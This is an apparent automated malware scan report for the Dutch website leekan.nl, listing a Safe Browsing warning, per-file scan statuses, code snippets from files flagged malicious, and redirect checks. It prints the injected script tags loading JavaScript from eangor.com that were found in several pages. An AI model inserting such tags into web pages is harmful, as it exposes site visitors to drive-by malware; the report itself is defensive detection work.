Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=leekan.nl
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://leekan.nl/ | 200 OK Content-Length: 6948 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://eangor.com/24/ZsA9L1dO.php?id=4052206" type="text/javascript"></script> | ||
http://leekan.nl/res/swfobject.js | 200 OK Content-Length: 31036 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)  var swfobject = function() { var UNDEF = "undefined", OBJECT = "object", SHOCKWAVE_FLASH = "Shockwave Flash", SHOCKWAVE_FLASH_AX = "ShockwaveFlash.ShockwaveFlash", FLASH_MIME_TYPE = "application/x-shockwave-flash", EXPRESS_INSTALL_ID = "SWFObjectExprInst", ON_READY_STATE_CHANGE = "onreadystatechange", win = window, doc = document, nav = navigator, plugin = false, domLoadFnArr = [main], regObjArr = [], objI Antivirus reports:
| ||
http://leekan.nl/res/jquery.js | 200 OK Content-Length: 97217 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a,b){function cu(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cr(a){if(!cg[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ch||(ch=c.createElement("iframe"),ch.frameBorder=ch.width=ch.height=0),b.appendChild(ch);if(!ci||!ch.createElement)ci=(ch.contentWindow||ch.contentDocument).document,ci.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),ci.close();d=c Antivirus reports:
| ||
http://leekan.nl/res/x5engine.js | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://leekan.nl/res/x5cartengine.js | 200 OK Content-Length: 54640 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) _jq.extend(x5engine.imCart, { _restoreSpecialChars: function (str) { return str.replace(/\{1\}/g, "'").replace(/\{2\}/g, "\"").replace(/\{3\}/g, "\\").replace(/\{4\}/g, "<").replace(/\{5\}/g, ">") }, // Test if cookies are working in the current browser _testCookie: function () { _jq.imCookie("imCookieTest", "test_content"); if (_jq.imCookie("imCookieTest") == "test_content") return true; return false; }, // Get the product array /*/f82c4e*/ Antivirus reports:
| ||
http://leekan.nl/res/l10n.js | 200 OK Content-Length: 20966 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) x5engine.l10n.addLocalization('admin_comment_abuse', 'Dit bericht is als misbruik aangemerkt'); x5engine.l10n.addLocalization('admin_seo_auth', 'Meldt u aan bij uw Google Webmaster Tools account'); x5engine.l10n.addLocalization('admin_seo_crawl_mex', 'Berichten van Google Bot'); x5engine.l10n.addLocalization('admin_seo_home', 'Resultaten indexering'); x5engine.l10n.addLocalization('admin_seo_keys', 'Geïndexeerde kernwoorden'); x5engine.l10n.addLocalization('admin_seo_message Antivirus reports:
| ||
http://leekan.nl/res/x5settings.js | 200 OK Content-Length: 7222 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) x5engine.imQueue.push_init("x5engine.imDate('.imDate')"); x5engine.imQueue.push_init("x5engine.imHour('.imHour')"); x5engine.imQueue.push_init("x5engine.imAccess.showLogout()"); x5engine.imQueue.push_init("x5engine.utils.autoHeight()"); x5engine.imQueue.push_init("x5engine.imCart.updateWidget()"); x5engine.imQueue.push_init("x5engine.imCart.setupProductList()"); x5engine.imQueue.push_init("x5engine.imGrid.init()"); x5engine.imQueue.push_init("x5engine.imMenu.setup({ t Antivirus reports:
| ||
http://leekan.nl/index.html | 200 OK Content-Length: 6948 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://eangor.com/24/ZsA9L1dO.php?id=4052206" type="text/javascript"></script> | ||
http://leekan.nl/mail.html | 200 OK Content-Length: 8794 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://eangor.com/24/ZsA9L1dO.php?id=4052207" type="text/javascript"></script> | ||
http://leekan.nl/login-catalog.php | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 06 Nov 2014 16:06:53 GMT Pragma: no-cache Location: imlogin.php Server: nginx Content-Length: 5737 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=hagme3m4nk9v9pucdn45f0ln83; path=/ X-Powered-By: PleskLin | clean |
http://leekan.nl/imlogin.php | 200 OK Content-Length: 4354 Content-Type: text/html | clean |
http://eangor.com/24/ZsA9L1dO.php?id=4052204 | HTTP/1.1 302 Found Connection: close Date: Thu, 06 Nov 2014 16:06:56 GMT Location: http://host145.hostmonster.com/suspended.page/disabled.cgi/eangor.com?id=4052204 Server: cloudflare-nginx Content-Type: text/html; charset=iso-8859-1 CF-RAY: 18528a8957760b02-WAW Set-Cookie: __cfduid=da1f6812271e591e8aaf13b121ae2f5bc1415290016217; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.eangor.com; HttpOnly | clean |
http://host145.hostmonster.com/suspended.page/disabled.cgi/eangor.com?id=4052204 | 200 OK Content-Length: 4780 Content-Type: text/html | clean |
http://host145.hostmonster.com/test404page.js | 404 Not Found Content-Length: 28 Content-Type: text/html | clean |
http://leekan.nl/imsitemap.html | 200 OK Content-Length: 4179 Content-Type: text/html | suspicious |
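Suspicious code found <script src="http://eangor.com/24/ZsA9L1dO.php?id=4052205" type="text/javascript"></script> |
Note: the eangor.com URL fetched by the scanner answered with a 302 to a host145.hostmonster.com "suspended.page" address (see the eangor.com row above), so its "clean" status describes that redirect target at scan time. It does not clear the injected script tags, which are still present in the pages marked suspicious.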
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: leekan.nl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Nov 2014 16:06:50 GMT
Accept-Ranges: bytes
ETag: "52d1fb77-1b24"
Server: nginx
Content-Length: 6948
Content-Type: text/html
Last-Modified: Sun, 12 Jan 2014 02:18:31 GMT
X-Powered-By: PleskLin
...6948 bytes of data.
GET / HTTP/1.1
Host: leekan.nl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Nov 2014 16:06:50 GMT
Accept-Ranges: bytes
ETag: "52d1fb77-1b24"
Server: nginx
Content-Length: 6948
Content-Type: text/html
Last-Modified: Sun, 12 Jan 2014 02:18:31 GMT
X-Powered-By: PleskLin
...6948 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: leekan.nl
Referer: http://www.google.com/search?q=leekan.nl
Result:
The result matches the first query; no suspicious redirects were found. The two requests shown differ only in the Referer header.
GET / HTTP/1.1
Host: leekan.nl
Referer: http://www.google.com/search?q=leekan.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.